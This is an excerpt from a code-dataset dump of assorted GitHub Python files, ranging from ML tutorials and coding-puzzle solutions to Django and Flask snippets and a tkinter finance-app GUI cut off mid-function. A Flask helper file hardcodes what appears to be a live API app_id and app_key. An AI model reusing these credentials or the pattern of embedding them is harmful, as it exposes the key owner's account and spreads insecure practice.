w in context], dtype=torch.long)\n\n # Step 2. Recall that torch *accumulates* gradients. 
Before passing in a\n # new instance, you need to zero out the gradients from the old\n # instance\n model.zero_grad()\n\n # Step 3. Run the forward pass, getting log probabilities over next\n # words\n log_probs = model(context_idxs)\n\n # Step 4. Compute your loss function. (Again, Torch wants the target\n # word wrapped in a tensor)\n loss = loss_function(log_probs, torch.tensor([word_to_ix[target]], dtype=torch.long))\n\n # Step 5. Do the backward pass and update the gradient\n loss.backward()\n optimizer.step()\n\n # Get the Python number from a 1-element Tensor by calling tensor.item()\n total_loss += loss.item()\n losses.append(total_loss)\nprint(losses) # The loss decreased every iteration over the training data!\n\ntest= ['We', 'are', 'to', 'study']\ninput = torch.tensor([word_to_ix[w] for w in test], dtype=torch.long)\nout = model(input)\nprint(out)\nmaxprob,prediclabel = torch.max(out, 1)\npredict_word = id_to_word[prediclabel.item()]\nprint(predict_word)","repo_name":"ShenMinXu/Pytorch-NLP-papers-implementation","sub_path":"pytorch-tutorial/WordEmbedding-CBOW.py","file_name":"WordEmbedding-CBOW.py","file_ext":"py","file_size_in_byte":3613,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"18303696939","text":"import os\nimport requests\nimport urllib.parse\n\nfrom flask import redirect, render_template, request, session\nfrom functools import wraps\n\n# Renders a picture of apology\ndef apology(message, code=400):\n def escape(s):\n \"\"\"\n Escape special characters.\n\n https://github.com/jacebrowning/memegen#special-characters\n \"\"\"\n for old, new in [(\"-\", \"--\"), (\" \", \"-\"), (\"_\", \"__\"), (\"?\", \"~q\"),\n (\"%\", \"~p\"), (\"#\", \"~h\"), (\"/\", \"~s\"), (\"\\\"\", \"''\")]:\n s = s.replace(old, new)\n return s\n return render_template(\"apology.html\", top=code, bottom=escape(message)), code\n\n\ndef log_req(f):\n \"\"\"\n Decorate routes to require login.\n\n https://flask.palletsprojects.com/en/1.1.x/patterns/viewdecorators/\n \"\"\"\n @wraps(f)\n def fun(*args, **kwargs):\n if session.get(\"user_id\") is None:\n return redirect(\"/login\")\n return f(*args, **kwargs)\n return fun\n\n\ndef lookup(symbol):\n \"\"\"Look up quote for city\"\"\"\n\n # Connect API\n try:\n headers_dict = {\"Accept\": \"application/json\", \"app_id\": \"adf587a8\", \"app_key\": \"e4fe059f048765a5a7527fa3f68910ff\", \"ResourceVersion\": \"v4\"}\n url = f\"https://api.schiphol.nl/public-flights/destinations/{urllib.parse.quote_plus(symbol)}\"\n \n\n\n response = requests.get(url, headers=headers_dict)\n response.raise_for_status()\n except requests.RequestException:\n return None\n\n \n try:\n get = response.json()\n return {\n \"city\": get[\"city\"]\n }\n except (KeyError, TypeError, ValueError):\n return None\n\n\ndef search(flight):\n\n # Connect API\n try:\n headers_dict = {\"Accept\": \"application/json\", \"app_id\": \"adf587a8\", \"app_key\": \"e4fe059f048765a5a7527fa3f68910ff\", \"ResourceVersion\": \"v4\"}\n url = f\"https://api.schiphol.nl/public-flights/flights?scheduleDate={urllib.parse.quote_plus(flight)}&includedelays=false\"\n\n\n response = requests.get(url, headers=headers_dict)\n response.raise_for_status()\n except requests.RequestException:\n return None\n\n # Specifying the return of the search\n try:\n get = response.json()\n return {\n \"flights\": get[\"flights\"]\n }\n except (KeyError, TypeError, ValueError):\n return None\n\n\ndef USD(value):\n return 
f\"${value:,.2f}\"\n","repo_name":"sezimy/Online-Flight-Booking-Web-Application","sub_path":"helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":2368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21149746524","text":"class Solution:\n def containsNearbyDuplicate(self, nums: List[int], k: int) -> bool:\n # Time and Space Complexity: O(N)\n\n index = {}\n\n for i, num in enumerate(nums):\n if num in index and i - index[num] <= k:\n return True\n\n index[num] = i\n\n return False\n","repo_name":"nhatsmrt/AlgorithmPractice","sub_path":"LeetCode/219. Contains Duplicate II/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":321,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"37"} +{"seq_id":"38429443037","text":"# Standard File import method\ninputfile = open('input.txt','r')\ninputtext = inputfile.read()\ninputfile.close()\n\n# --- Solution code --- \n\n\ndef processInputToSpreadsheet(input : str) -> list :\n return [[int(x) for x in line.split()] for line in input.splitlines()]\n \n\n# part 1\nexample = '''5 1 9 5\n7 5 3\n2 4 6 8'''\n\ndef calculateSpreadsheetChecksum(spreadsheet : list) -> int:\n sum = 0\n for line in spreadsheet:\n sum += max(line) - min(line) \n return sum\n\ndef solvePart1(input : str):\n print(calculateSpreadsheetChecksum(processInputToSpreadsheet(input)))\n\nsolvePart1(example)\nsolvePart1(inputtext)\n\n# part 2\n\nexample2 = '''5 9 2 8\n9 4 7 3\n3 8 6 5'''\n\ndef sumEvenlyDivisibleNumbers(spreadsheet : list) -> int:\n sum = 0\n for line in spreadsheet:\n for i in range(len(line)):\n for j in range(len(line)):\n if i != j:\n a = line[i]\n b = line[j]\n if (float(a//b) == a/b):\n sum += a//b\n return sum\n\ndef solvePart2(input : str):\n print(sumEvenlyDivisibleNumbers(processInputToSpreadsheet(input)))\n\nsolvePart2(example2)\nsolvePart2(inputtext)","repo_name":"Mezz-Davies/AdventOfCode","sub_path":"2017/2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31247673127","text":"from scipy.optimize import brentq\n\n# Local application/library specific imports\nfrom py_vollib.ref_python.black_scholes_merton import black_scholes_merton\n\n\n# -----------------------------------------------------------------------------\n# FUNCTIONS\n\ndef implied_volatility(price, S, K, t, r, q, flag):\n \"\"\"Calculate the Black-Scholes-Merton implied volatility.\n\n :param S: underlying asset price\n :type S: float\n :param K: strike price\n :type K: float\n :param sigma: annualized standard deviation, or volatility\n :type sigma: float\n :param t: time to expiration in years\n :type t: float\n :param r: risk-free interest rate\n :type r: float\n :param q: annualized continuous dividend rate\n :type q: float\n :param flag: 'c' or 'p' for call or put.\n :type flag: str\n\n >>> S = 100\n >>> K = 100\n >>> sigma = .2\n >>> r = .01\n >>> flag = 'c'\n >>> t = .5\n >>> q = .02\n\n >>> price = black_scholes_merton(flag, S, K, t, r, sigma, q)\n >>> implied_volatility(price, S, K, t, r, q, flag)\n 0.20000000000000018\n\n >>> flac = 'p'\n >>> sigma = 0.3\n >>> price = black_scholes_merton(flag, S, K, t, r, sigma, q)\n >>> price\n 8.138101080183894\n >>> implied_volatility(price, S, K, t, r, q, flag)\n 0.30000000000000027\n \"\"\"\n\n f = lambda sigma: price - black_scholes_merton(flag, S, K, t, r, sigma, q)\n\n 
return brentq(\n f,\n a=1e-12,\n b=100,\n xtol=1e-15,\n rtol=1e-15,\n maxiter=1000,\n full_output=False\n )\n\n\nif __name__ == \"__main__\":\n from py_vollib.helpers.doctest_helper import run_doctest\n run_doctest()\n","repo_name":"vollib/py_vollib","sub_path":"py_vollib/ref_python/black_scholes_merton/implied_volatility.py","file_name":"implied_volatility.py","file_ext":"py","file_size_in_byte":1641,"program_lang":"python","lang":"en","doc_type":"code","stars":240,"dataset":"github-code","pt":"37"} +{"seq_id":"19309671016","text":"\ndef es_num(car):\n return car in '0123456789'\n\ndef test():\n \n # Punto 1\n # contenido = 'Argentina ganó 2 mundiales en 1978 y en 1986 y un2o3 un2.'\n cd = 0\n p_dos_d = 0\n\n # Punto 2\n # contenido = 'Las laderas de las montañas están labradas.'\n es_primera = True\n es_l = False\n es_la = False\n p_com_la = 0\n \n #Punto 3\n promedio = 0\n cd_con_la = 0\n cl = 0\n\n # Punto 4\n contenido = 'Las lluvias se llevaron los llantos.'\n es_ll = False\n es_v = False\n p_com_ll_t_v = 0\n\n for car in contenido:\n if car == ' ' or car == '.':\n \n if cd >= 2:\n p_dos_d += 1\n \n if es_la:\n p_com_la += 1\n cd_con_la += cl\n\n if es_ll and es_v:\n p_com_ll_t_v += 1\n\n es_primera = True\n es_la = False\n es_ll = False\n es_l = False\n es_v = False\n cd = 0\n cl = 0\n\n else:\n\n if es_num(car):\n cd += 1\n \n print(cd)\n\n if es_primera and (car == 'l' or car == 'L'):\n es_l = True\n es_primera = False\n elif es_l and car == 'a':\n es_la = True\n es_l = False\n elif es_l and car == 'l':\n es_ll = True\n es_l = False\n\n if car == 'v':\n es_v = True\n\n cl += 1\n\n \n print('La cantidad de palabras con al menos dos digiros son: ', p_dos_d)\n print('La cantidad de palabras que comienzan con la son: ', p_com_la)\n if p_com_la != 0:\n print('El promedio de las letras de las palabras que cumplieron el comenzar con la: ',cd_con_la/p_com_la)\n print('La cantidad de palabras que comenzaron con ll:', p_com_ll_t_v) \n\nif __name__ == '__main__':\n test()\n\n\n","repo_name":"franAndrad/python-src","sub_path":"clases/f13_e5.py","file_name":"f13_e5.py","file_ext":"py","file_size_in_byte":1893,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"18668278088","text":"from django.contrib import admin\nfrom mainapp.models import ProductCategory, Product\n\n\n# Register your models here.\n\n\n@admin.register(Product)\nclass ProductAdmin(admin.ModelAdmin):\n list_display = ('name', 'category', 'price', 'quantity')\n search_fields = ('name', 'category__name')\n ordering = ('quantity', 'price')\n fields = ('name', 'description', 'category', 'image', ('price', 'quantity'))\n\n\n@admin.register(ProductCategory)\nclass ProductCategoryAdmin(admin.ModelAdmin):\n search_fields = ('name',)\n ordering = ('name',)\n","repo_name":"Kllraz/geekshop","sub_path":"mainapp/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22088863352","text":"\"\"\"Tests for main.py.\"\"\"\n\n# System Imports\nimport logging\n\n# Relative Imports\nimport pytest\nfrom solver import reduce_from_answer, reduce_from_feedback, solve\n\n\n@pytest.mark.parametrize(\n \"candidate, answer, word_list, reduced_list\",\n [\n (\"drink\", \"spoon\", [\"blink\", \"snoop\", \"raven\"], [\"snoop\"]),\n (\"drink\", \"spoon\", [\"snoop\", \"spool\"], [\"snoop\"]),\n (\"coded\", \"spoon\", [\"snoop\", \"speak\"], [\"snoop\"]),\n (\"spoon\", 
\"chore\", [\"clock\", \"crook\", \"prawn\"], [\"clock\"]),\n (\"abfgc\", \"abcde\", [\"cdabc\", \"abfgh\", \"abjck\"], [\"abjck\"]),\n ],\n)\ndef test_reduce_from_answer(caplog, candidate, answer, word_list, reduced_list):\n \"\"\"Test reduce_from_answer works as expected.\"\"\"\n\n # Set the logger capture level for debugging.\n caplog.set_level(logging.DEBUG)\n\n # Given - Parameterised Inputs\n\n # When\n _reduced_list = reduce_from_answer(candidate, answer, word_list)\n\n # Then\n assert _reduced_list == reduced_list\n\n\ndef test_reduce_from_feedback():\n \"\"\"Test reduce_from_feedback function works as expected.\"\"\"\n\n # Given\n words = [\"could\", \"moult\", \"would\", \"wound\", \"young\", \"youth\"]\n\n # When\n reduced_words = reduce_from_feedback(\"nobly\", \"_G_G_\", words)\n\n # Then\n assert reduced_words == [\"could\", \"moult\", \"would\"]\n\n\n@pytest.mark.parametrize(\n \"guesses,feedback\",\n [\n ([\"raise\", \"nobly\", \"could\"], [\"_____\", \"_G_G_\", \"GGGGG\"]),\n (\n [\"raise\", \"deter\", \"lower\", \"bluer\", \"ulcer\"],\n [\"y___y\", \"___GG\", \"Y__GG\", \"_GYGG\", \"GGGGG\"],\n ),\n ],\n)\ndef test_solve(caplog, guesses, feedback):\n \"\"\"Test solve function works as expected.\"\"\"\n\n # Set the logger capture level for debugging.\n caplog.set_level(logging.DEBUG)\n\n # Setup\n with open(\"../../five_letter_words.txt\", \"r\") as f:\n words = f.read().splitlines()\n\n for i, (guess, feedback) in enumerate(zip(guesses, feedback)):\n\n words = reduce_from_feedback(guess, feedback.upper(), words)\n top_guess = list(solve(words, 1).keys())[0]\n\n try:\n assert guesses[i + 1] == top_guess\n except IndexError:\n pass\n\n assert len(words) == 1\n","repo_name":"harry-optimised/wordle_solver","sub_path":"src/wordle_solver/test_solve.py","file_name":"test_solve.py","file_ext":"py","file_size_in_byte":2173,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"16293161419","text":"import struct\nfrom mint import *\n\n@actor\ndef _():\n a.send('\\xff', b.mac)\n elapse(200)\n a.send('\\xfe', b.mac)\n\n@actor\ndef _():\n elapse(80)\n b.send('\\x81', a.mac)\n\na, b, c = Host(), Host(), Host()\nswitch = Switch()\nlink(a, switch.tips[0])\nlink(b, switch.tips[1])\nlink(c, switch.tips[2])\n\nrun(gui=True, until=341)\n","repo_name":"fans656/mint-dev","sub_path":"mint/_versions/20151130184549 gui switch with frame animation/main 3host 1switch.py","file_name":"main 3host 1switch.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"666803402","text":"import pandas as pd\n\ndadosUc = pd.read_csv('materias.csv')\n\n#print(dadosUc)\n\n\nfor indice, coluna in dadosUc.iterrows():\n if indice['Termo'] == 1 or indice['Termo'] == 2:\n print (indice['Nome da UC'])\n\n","repo_name":"aamgoulart/unifesp","sub_path":"PCOMP2019-1/leitura.py","file_name":"leitura.py","file_ext":"py","file_size_in_byte":211,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21390291779","text":"#Riley Roberts\r\n#CSCI Assignment 10\r\n#12/18/2014\r\n#This program takes a multiply recursive function and draws it over and over\r\n#to make a cool 'spiky wheel' shape. 
\r\n\r\nimport turtle, random\r\n\r\n\r\na = turtle.Turtle()\r\nb = turtle.Turtle()\r\nc = turtle.Turtle()\r\nd = turtle.Turtle() #Making all the turtles\r\ne = turtle.Turtle()\r\nf = turtle.Turtle()\r\n\r\nwn = turtle.Screen() #Screen\r\nwn.tracer(0) #Turn on tracer if you don't want to wait \r\na.shape(\"turtle\")\r\nb.shape(\"turtle\")\r\nc.shape(\"turtle\")\r\nd.shape(\"turtle\")\r\ne.shape(\"turtle\") #Turtles are turtle shaped :D\r\nf.shape(\"turtle\") \r\n\r\na.speed(0)\r\nb.speed(0)\r\nc.speed(0)\r\nd.speed(0)\r\ne.speed(0) #Speeds\r\nf.speed(0)\r\n\r\na.penup()\r\nb.penup()\r\nc.penup()\r\nd.up() #All pens up\r\ne.up()\r\nf.up()\r\n\r\na.goto(-200, 250)\r\nb.goto(-200, 0) #Their starting positions\r\nc.goto(-200, -250)\r\nd.goto(200, 250)\r\ne.goto(200, 0)\r\nf.goto(200, -250)\r\n\r\nd.setheading(180)\r\ne.setheading(180) #Turtles on right look inward\r\nf.setheading(180)\r\n\r\ndef recursiveObject(length, t):\r\n t.pendown() \r\n if length > 20:\r\n t.tilt(40) \r\n t.forward(length/2)\r\n t.right(5)\r\n t.forward(length/2)\r\n recursiveObject(length-15,t) #The super awesome recursive line with 'sharp' points\r\n R = random.random()\r\n B = random.random()\r\n G = random.random() #Random colors\r\n t.color(R, B, G) \r\n t.left(length/2) #Can be 3\r\n recursiveObject(length-20,t)\r\n t.backward(length/2)\r\n recursiveObject(length-15, t)\r\n\r\n\r\ndef myDrawing(length, t, levels):\r\n for i in range(51):\r\n if levels <= 7:\r\n recursiveObject(length, t) #This function calls the recursive shape\r\n levels = levels - 1 #When levels are lower, makes different shapes\r\n elif levels <= 5: \r\n recursiveObject(length-2, t)\r\n levels = levels - 1\r\n else:\r\n recursiveObject(length-4, t)\r\n\r\n t.ht() \r\n \r\n\r\nmyDrawing(70, a, 8)\r\nmyDrawing(70, b, 8)\r\nmyDrawing(70, c, 8) #All turtles are called!\r\nmyDrawing(70, d, 8)\r\nmyDrawing(70, e, 8)\r\nmyDrawing(70, f, 8) \r\n","repo_name":"Risauce/Pre2015Code","sub_path":"HighSchool/Old Assignment 10.py","file_name":"Old Assignment 10.py","file_ext":"py","file_size_in_byte":2366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73209674986","text":"import os\nimport tkinter\nfrom tkinter import Tk \nfrom tkinter import filedialog\nimport io\nfrom io import*\nfrom Analizador_Ventas import *\nfrom Mes import *\nfrom Producto import *\nfrom Reporte import *\nventas = Analizador_Ventas()\nDatos = \"\"\n\ndef Menu():\n opcion = True \n \n while opcion :\n \n print(\"**** Funciones del Sistema ****\")\n print(\"** Elija una opción **\")\n print(\"1. Cargar Datos\")\n print(\"2. Cargar Instrucciones\")\n print(\"3. Analizar\")\n print(\"4. Reportes\")\n print(\"5. 
Salir\")\n opcion = input (\"\")\n if opcion == \"1\" :\n print(\"\")\n print(\"---------- Data Cargada -----------\")\n Ventana_CargarVentas()\n \n print(\"\")\n\n elif opcion == \"2\" :\n print(\"\")\n print(\"--------- Instrucciones Cargadas ----------\")\n Ventana_CargarInstrucciones()\n print(\"\")\n\n elif opcion == \"3\" :\n print(\"\")\n print(\"---------- Análisis Hecho ----------\")\n global Datos\n #print(Datos)\n ventas.analizador_ventas(Datos)\n print(\"\")\n\n elif opcion == \"4\" :\n print(\"\")\n print(\"Reportes hechos\")\n Reporte()\n print(\"\")\n\n elif opcion == \"5\" :\n print(\"Gracias, vuelve pronto :)\")\n opcion = False\n \n else:\n input(\"Ingrese una opción válida :)\")\n print(\"\")\n\ndef Ventana_CargarVentas():\n archivo = filedialog.askopenfilename(initialdir = \"/\") \n ventas_upload = open(archivo ,'r',encoding =\"utf8\")\n read = ventas_upload.read()\n ventas_upload.close()\n global Datos\n Datos = read\n print(Datos)\n \n\ndef Ventana_CargarInstrucciones():\n archivo = filedialog.askopenfilename(initialdir = \"/\")\n instrucciones_upload = open(archivo, 'r',encoding = \"utf8\")\n read = instrucciones_upload.read()\n instrucciones_upload.close()\n print(read)\n\n\nif __name__ == \"__main__\":\n Menu()\n\n\n\n \n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Leonel1098/LFP_PR_201709088","sub_path":"Practica1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2073,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21167516832","text":"from django.conf.urls import patterns, include, url\n\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n # Examples:\n # url(r'^$', 'blog.views.home', name='home'),\n url(r'^sblog/', include('sblog.urls')),\n url(r'^comments/', include('django.contrib.comments.urls')),\n\n url(r'^admin/', include(admin.site.urls)),\n)\n","repo_name":"m8k7j/mysite","sub_path":"blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25462233636","text":"###\n#/***************************************************\n#File Name: gui.py\n#Version/Date: 1.0 (2020-05-13)\n#Programmer/ID: Raven Lim Zhe Xuan (1191101213)\n#Project Name: Smart Finance Manager \n#Teammates: Nagaindran A/L Kanaseelanayagam, Raja Muhammad Darwisy bin Raja Ahmad, Fong Zheng Wei\n#Course/Term: PSP0201 Mini IT Project (2019/20 T3)\n#***************************************************/\n###\nfrom tkinter import Frame, Label, Button, Canvas, PhotoImage\nfrom PIL import Image, ImageTk\nimport constants as Constants\nimport functions as Functions\n\nimport gui_planner as GUI_Planner\nimport gui_account as GUI_Account\nimport gui_investment as GUI_Investment\n\n# GUI\n# 1. EmptyWindow\n# 2. Set widgets\n# 3. AppendListToWidgets\n# 4. 
Place/pack widgets\n \n\nclass GUI(Frame):\n\n currentWindow = None\n currentSubWindow = None\n\n def __init__(self, Main, root = None, window: str = Constants.mainWindow):\n super().__init__(root)\n self.root = root\n self.Main = Main\n\n def Raise(exception):\n raise exception\n Functions.Switch([Constants.mainWindow, Constants.warningWindow, Constants.queryWindow], \n [self.InitMainWindow, self.InitWarnWindow, self.InitQueryWindow, \n lambda: Raise(Exception(\"No such window exists\")) ], window)\n \n \n# Window Functions\n def GetCurrentWindow(self) -> str:\n if (self.currentSubWindow is not None):\n return self.currentWindow + \" - \" + self.currentSubWindow\n else:\n return self.currentWindow\n\n def HideLastWindow(self):\n global container\n\n def SetContainer(frame: Frame):\n global container\n container = frame\n\n Functions.Switch(\n [Constants.mainWindow, Constants.warningWindow, Constants.queryWindow],\n [lambda: Functions.Switch( \n [Constants.mainMenuSub, Constants.plannerSub, Constants.accountSub, Constants.investmentSub],\n [ lambda: SetContainer(self.mainMenuFrame), \n lambda: SetContainer(self.plannerFrame), \n lambda: SetContainer(self.accountFrame), \n lambda: SetContainer(self.investmentFrame), \n lambda: SetContainer(None)], self.currentSubWindow\n ), \n lambda: print(None), lambda: print(None), \n lambda: print(\"Non existent\")], self.currentWindow\n )\n\n if (container is not None):\n container.pack_forget()\n\n\n# Main windows\n def InitQueryWindow(self):\n\n pass\n\n def InitWarnWindow(self):\n self.root.title(Constants.warningDisplayTitle)\n self.root.geometry(Constants.warningWindowSize)\n self.root.resizable(False, False)\n self.configure(background = Constants.warningWindowBgColor)\n self.pack(fill = \"both\" , expand = 1)\n \n def InitMainWindow(self):\n self.root.title(Constants.mainDisplayTitle)\n self.root.geometry(Constants.mainWindowSize)\n self.root.resizable(False, False)\n self.configure(background = Constants.mainWindowBgColor)\n self.pack(fill = \"both\" , expand = 1)\n\n self.mainWindowFrame = Frame(master = self)\n self.mainWindowFrame.configure(background = Constants.mainWindowBgColor)\n self.mainWindowFrame.pack(fill = \"both\", expand = 1)\n\n self.currentWindow = Constants.mainWindow\n\n self.InitMainMenu (self.mainWindowFrame)\n self.InitPlanner (self.mainWindowFrame)\n self.InitAccount (self.mainWindowFrame)\n self.InitInvestment(self.mainWindowFrame)\n self.InitNavBar (self.mainWindowFrame)\n\n # Boot Main Menu as first page for Main Window as default\n self.MainMenu(self.mainMenuFrame)\n\n\n# Main window Sub windows\n def InitMainMenu(self, parent: Frame):\n\n self.mainMenuFrame = Frame(master = parent)\n self.mainMenuFrame.configure(background = Constants.mainWindowBgColor)\n parent = self.mainMenuFrame\n\n self.buttonInitial = ImageTk.PhotoImage(Image.open(\"Assets/Button_Initial.png\"))\n self.buttonHover = ImageTk.PhotoImage(Image.open(\"Assets/Button_Hover.png\"))\n self.buttonDown = ImageTk.PhotoImage(Image.open(\"Assets/Button_Down.png\"))\n\n buttonPaths = [ \"Assets/Button_Planner_Initial.png\", \"Assets/Button_Account_Initial.png\", \"Assets/Button_Investment_Initial.png\", \"Assets/Button_Quit_Initial.png\",\n \"Assets/Button_Planner_Hover.png\" , \"Assets/Button_Account_Hover.png\" , \"Assets/Button_Investment_Hover.png\" , \"Assets/Button_Quit_Hover.png\",\n \"Assets/Button_Planner_Down.png\" , \"Assets/Button_Account_Down.png\" , \"Assets/Button_Investment_Down.png\" , \"Assets/Button_Quit_Down.png\"]\n\n self.initialButtons 
= [ImageTk.PhotoImage(Image.open(buttonPaths[i])) for i in range(0 , len(buttonPaths)//3)]\n self.hoverButtons = [ImageTk.PhotoImage(Image.open(buttonPaths[i])) for i in range(len(buttonPaths)//3 , len(buttonPaths)//3*2)]\n self.downButtons = [ImageTk.PhotoImage(Image.open(buttonPaths[i])) for i in range(len(buttonPaths)//3*2, len(buttonPaths))]\n \n self.plannerButton = Button(master = parent, command = lambda: self.Planner(self.plannerFrame))\n self.accountButton = Button(master = parent, command = lambda: self.Account(self.accountFrame))\n self.investButton = Button(master = parent, command = lambda: self.Investment(self.investmentFrame))\n self.quitButton = Button(master = parent, command = lambda: self.Main.ExitRoot())\n\n self.plannerButton.place(x = 640, y = Constants.firstButtonYVal, anchor = \"nw\")\n self.accountButton.place(x = 740, y = Constants.firstButtonYVal + Constants.nextButtonYDiff, anchor = \"nw\")\n self.investButton.place (x = 840, y = Constants.firstButtonYVal + Constants.nextButtonYDiff * 2, anchor = \"nw\")\n self.quitButton.place (x = 1060, y = Constants.firstButtonYVal + Constants.nextButtonYDiff * 3, anchor = \"nw\")\n\n updatedButtons = [self.plannerButton, self.accountButton, self.investButton, self.quitButton]\n\n def SetButton(button, targetImage):\n button.configure(image = targetImage, background = Constants.mainWindowBgColor)\n\n for i in range(len(updatedButtons)):\n updatedButtons[i].configure(borderwidth = 0, highlightthickness = 0, background = Constants.mainWindowBgColor, activeforeground = Constants.mainWindowBgColor, activebackground = Constants.mainWindowBgColor)\n\n butt = updatedButtons[i]\n SetButton(butt, self.initialButtons[i])\n\n updatedButtons[i].bind(\"\", lambda x, butt = butt, i = i: SetButton(butt, self.initialButtons[i]))\n updatedButtons[i].bind(\"\", lambda x, butt = butt, i = i: SetButton(butt, self.hoverButtons[i]))\n updatedButtons[i].bind(\"\", lambda x, butt = butt, i = i: SetButton(butt, self.downButtons[i]))\n updatedButtons[i].bind(\"\", lambda x, butt = butt, i = i: SetButton(butt, self.initialButtons[i]))\n\n self.statusFrame = Frame(master = parent, bg = Constants.mainWindowBgColor)\n self.statusFrame.place(x = 80, y = 80, anchor = \"nw\")\n self.statusLabel = Label(master = self.statusFrame, text = \"Smart Financial Planner\", font = (\"Comic Sans MS\", 48),bg = Constants.mainWindowBgColor)\n self.statusLabel.pack()\n\n def InitPlanner(self, parent: Frame):\n\n self.plannerFrame = Frame(master = parent)\n self.plannerFrame.configure(background = Constants.mainWindowBgColor)\n parent = self.plannerFrame\n\n self.plannerContainer = Frame(master = parent, bg = Constants.mainWindowBgColor, width = 1280-54, height = 720)\n self.plannerContainer.place(x = 54, y = 0, anchor = \"nw\")\n\n self.plannerTitle = Label(master = self.plannerFrame, text = \"Planner\", font = (\"\", 36), bg = Constants.mainWindowBgColor)\n self.plannerTitle.place(x = 55, y = 0, anchor = \"nw\")\n\n self.planner = GUI_Planner.GUI_Planner(parent, self.Main)\n\n def InitAccount(self, parent: Frame):\n\n self.accountFrame = Frame(master = parent)\n self.accountFrame.configure(background = Constants.mainWindowBgColor)\n parent = self.accountFrame\n \n self.accountContainer = Frame(master = parent, bg = Constants.mainWindowBgColor, width = 1280-54, height = 720)\n self.accountContainer.place(x = 54, y = 0, anchor = \"nw\")\n\n self.accountTitle = Label(master = self.accountFrame, text = \"Account\", font = (\"\", 36), bg = Constants.mainWindowBgColor)\n 
self.accountTitle.place(x = 55, y = 0, anchor = \"nw\")\n\n self.account = GUI_Account.GUI_Account(parent, self.Main)\n\n def InitInvestment(self, parent: Frame):\n\n self.investmentFrame = Frame(master = parent)\n self.investmentFrame.configure(background = Constants.mainWindowBgColor)\n parent = self.investmentFrame\n\n self.investmentContainer = Frame(master = parent, bg = Constants.mainWindowBgColor, width = 1280-54, height = 720)\n self.investmentContainer.place(x = 54, y = 0, anchor = \"nw\")\n\n self.investmentTitle = Label(master = self.investmentFrame, text = \"Investment\", font = (\"\", 36), bg = Constants.mainWindowBgColor)\n self.investmentTitle.place(x = 55, y = 0, anchor = \"nw\")\n\n self.investment = GUI_Investment.GUI_Investment(parent, self.Main)\n\n def InitNavBar(self, parent: Frame):\n \n self.navBarFrame = Frame(master = parent)\n self.navBarFrame.configure(height = 720, width = 54, bg = Constants.navBarColor)\n self.navBarFrame.pack_propagate(0)\n\n self.navButtonContainer = Frame(master = self.navBarFrame, bg = Constants.navBarColor)\n self.navButtonContainer.place(relx = 0, rely = 0, anchor = \"nw\")\n\n self.backIcon = ImageTk.PhotoImage(Image.open(\"Assets/Icon_Back.png\"))\n self.plannerIcon = ImageTk.PhotoImage(Image.open(\"Assets/Icon_Planner.png\"))\n self.accountIcon = ImageTk.PhotoImage(Image.open(\"Assets/Icon_Account.png\"))\n self.investmentIcon = ImageTk.PhotoImage(Image.open(\"Assets/Icon_Investment.png\"))\n\n self.mainMenuNavButton = Button(master = self.navButtonContainer, command = lambda: self.MainMenu(self.mainMenuFrame), \n width = 50, bg = Constants.navBarColor, highlightthickness = 0, \n activeforeground = Constants.navBarColor, activebackground = Constants.navBarColor, image = self.backIcon)\n self.plannerNavButton = Button(master = self.navButtonContainer, command = lambda: self.Planner(self.plannerFrame),\n width = 50, bg = Constants.navBarColor, highlightthickness = 0, \n activeforeground = Constants.navBarColor, activebackground = Constants.navBarColor, image = self.plannerIcon)\n\n self.accountNavButton = Button(master = self.navButtonContainer, command = lambda: self.Account(self.accountFrame), \n width = 50, bg = Constants.navBarColor, highlightthickness = 0, \n activeforeground = Constants.navBarColor, activebackground = Constants.navBarColor, image = self.accountIcon)\n\n self.investmentNavButton = Button(master = self.navButtonContainer, command = lambda: self.Investment(self.investmentFrame), \n width = 50, bg = Constants.navBarColor, highlightthickness = 0, \n activeforeground = Constants.navBarColor, activebackground = Constants.navBarColor, image = self.investmentIcon)\n\n\n self.mainMenuNavButton.grid (row = 0, column = 0)\n self.plannerNavButton.grid (row = 1, column = 0)\n self.accountNavButton.grid (row = 2, column = 0)\n self.investmentNavButton.grid(row = 3, column = 0)\n \n def ShowNavBar(self):\n global navBarIsShown\n if (\"navBarIsShown\" in globals()):\n if (not navBarIsShown):\n self.navBarFrame.place(relx = 0, rely = 0, anchor = \"nw\")\n navBarIsShown = True\n else:\n self.navBarFrame.place(relx = 0, rely = 0, anchor = \"nw\")\n navBarIsShown = True\n\n def HideNavBar(self):\n global navBarIsShown\n if (\"navBarIsShown\" in globals()):\n if (navBarIsShown):\n self.navBarFrame.place(relx = 0, rely = 0, anchor = \"se\")\n navBarIsShown = False\n else:\n self.navBarFrame.place(relx = 0, rely = 0, anchor = \"se\")\n navBarIsShown = False\n\n pass\n\n\n# Sub window Changer\n\n def MainMenu(self, parent: Frame):\n 
